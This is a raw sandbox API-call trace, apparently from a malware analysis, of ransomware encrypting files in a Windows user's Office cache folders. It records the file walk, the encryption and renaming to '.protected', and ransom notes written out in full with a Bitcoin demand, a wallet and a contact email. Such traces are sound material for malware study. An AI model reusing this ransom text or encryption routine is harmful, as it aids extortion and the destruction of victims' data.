-1 [0085.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\.") returned 87 [0085.088] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.088] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.088] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.088] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.088] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.088] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.088] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\..") returned 88 [0085.088] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.088] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.088] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="Windows") returned -1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="Program Files") returned -1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="Program Files (x86)") returned -1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="$Recycle.bin") returned 1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="System Volume Information") returned -1 [0085.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD") returned 98 [0085.088] StrStrIW (lpFirst="FSD-CNRY.FSD", lpSrch=".protected") returned 0x0 [0085.088] lstrcmpW (lpString1="FSD-CNRY.FSD", lpString2="RESTORE_FILES.txt") returned -1 [0085.088] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.088] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD") returned 98 [0085.089] StrStrW (lpFirst="FSD-CNRY.FSD", lpSrch=".txt") returned 0x0 [0085.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD") returned 98 [0085.090] StrStrW (lpFirst="FSD-CNRY.FSD", lpSrch=".rar") returned 0x0 [0085.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD") returned 98 [0085.090] StrStrW (lpFirst="FSD-CNRY.FSD", lpSrch=".zip") returned 0x0 [0085.090] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.102] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.102] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.102] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.102] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.103] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.103] CloseHandle (hObject=0x154) returned 1 [0085.104] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.protected") returned 108 [0085.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd.protected")) returned 1 [0085.116] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.117] lstrcmpiW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="Windows") returned -1 [0085.117] lstrcmpiW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="Program Files") returned -1 [0085.117] lstrcmpiW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="Program Files (x86)") returned -1 [0085.117] lstrcmpiW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="$Recycle.bin") returned 1 [0085.117] lstrcmpiW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="System Volume Information") returned -1 [0085.117] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD") returned 132 [0085.117] StrStrIW (lpFirst="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpSrch=".protected") returned 0x0 [0085.117] lstrcmpW (lpString1="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpString2="RESTORE_FILES.txt") returned -1 [0085.117] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.117] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD") returned 132 [0085.117] StrStrW (lpFirst="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpSrch=".txt") returned 0x0 [0085.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD") returned 132 [0085.117] StrStrW (lpFirst="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpSrch=".rar") returned 0x0 [0085.118] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD") returned 132 [0085.118] StrStrW (lpFirst="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpSrch=".zip") returned 0x0 [0085.118] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.119] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.119] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.120] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.120] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.120] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.120] CloseHandle (hObject=0x154) returned 1 [0085.128] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.protected") returned 142 [0085.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd.protected")) returned 1 [0085.129] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.129] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="Windows") returned -1 [0085.129] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="Program Files") returned -1 [0085.130] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="Program Files (x86)") returned -1 [0085.130] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="$Recycle.bin") returned 1 [0085.130] lstrcmpiW (lpString1="FSF-CTBL.FSF", lpString2="System Volume Information") returned -1 [0085.130] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF") returned 98 [0085.130] StrStrIW (lpFirst="FSF-CTBL.FSF", lpSrch=".protected") returned 0x0 [0085.130] lstrcmpW (lpString1="FSF-CTBL.FSF", lpString2="RESTORE_FILES.txt") returned -1 [0085.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF") returned 98 [0085.130] StrStrW (lpFirst="FSF-CTBL.FSF", lpSrch=".txt") returned 0x0 [0085.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF") returned 98 [0085.130] StrStrW (lpFirst="FSF-CTBL.FSF", lpSrch=".rar") returned 0x0 [0085.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF") returned 98 [0085.130] StrStrW (lpFirst="FSF-CTBL.FSF", lpSrch=".zip") returned 0x0 [0085.131] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x72, lpOverlapped=0x0) returned 1 [0085.132] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.132] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x72, lpOverlapped=0x0) returned 1 [0085.132] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.132] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.132] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.133] CloseHandle (hObject=0x154) returned 1 [0085.133] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.protected") returned 108 [0085.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf.protected")) returned 1 [0085.134] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.134] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.134] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\RESTORE_FILES.txt") returned 103 [0085.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.134] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.134] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.135] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.135] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.136] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.136] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0085.136] CloseHandle (hObject=0x150) returned 1 [0085.136] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.136] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.136] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\RESTORE_FILES.txt") returned 87 [0085.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.136] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.136] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.137] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.137] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.137] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.137] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.137] CloseHandle (hObject=0x14c) returned 1 [0085.138] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.138] lstrcmpiW (lpString1="Groove", lpString2="Windows") returned -1 [0085.139] lstrcmpiW (lpString1="Groove", lpString2="Program Files") returned -1 [0085.139] lstrcmpiW (lpString1="Groove", lpString2="Program Files (x86)") returned -1 [0085.139] lstrcmpiW (lpString1="Groove", lpString2="$Recycle.bin") returned 1 [0085.139] lstrcmpiW (lpString1="Groove", lpString2="System Volume Information") returned -1 [0085.139] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove") returned 71 [0085.139] lstrcmpW (lpString1="Groove", lpString2=".") returned 1 [0085.139] lstrcmpW (lpString1="Groove", lpString2="..") returned 1 [0085.139] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\*") returned 73 [0085.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.139] lstrcmpiW (lpString1=".", 